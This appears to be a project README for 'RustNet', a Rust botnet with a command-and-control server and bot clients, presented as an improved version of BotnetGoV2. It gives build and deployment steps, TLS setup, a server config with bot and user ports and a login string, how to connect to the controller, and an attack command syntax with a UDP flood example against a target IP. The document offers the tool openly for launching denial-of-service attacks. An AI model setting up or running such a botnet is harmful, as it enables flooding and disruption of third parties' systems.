| Login | Dashboard |
|---|---|
![]() |
![]() |
| User | Admin | Owner |
|---|---|---|
![]() |
![]() |
![]() |
| C2 Debug | Client Debug |
|---|---|
![]() |
![]() |
This is an improved and more polished version of BotnetGoV2, redesigned from the ground up to be cleaner, faster, and easier to work with.
- High-Performance Architecture built for speed and scale.
- End-to-End Encryption to keep all traffic secure and unreadable.
- Cross-Platform Support for Linux (including WSL) and Windows.
- Modular System Design so components stay easy to extend and maintain.
- Advanced Management Tools, including:
- Role-Based Access Control (Owner, Admin, Basic).
- Real-time bot status, health checks, and telemetry.
- SQLite-backed user accounts, roles, and audit logs.
OpenSSL is required for generating TLS certificates and enabling secure admin connections.
Linux:
sudo apt install openssl libssl-devWindows:
Install via vcpkg or Chocolatey.
The server is the central controller. It needs a config file and TLS certificates before it can run.
cd server
cargo build --releaseopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes -subj "/CN=RustNet Server"[server]
user_port = 1420
bot_port = 7002
enable_tls = true
login_magic_string = "loginforme"./target/release/rustnet-servercd client
cargo build --releasec2_address.txt and bot_token.txt should be placed beside the client executable.
./target/release/rustnet-clientUse OpenSSL:
openssl s_client -connect localhost:1420 -quietattack <method> <target_ip> <port> <duration>
Example:
attack UDP 192.168.1.50 80 60
MIT License. See LICENSE.






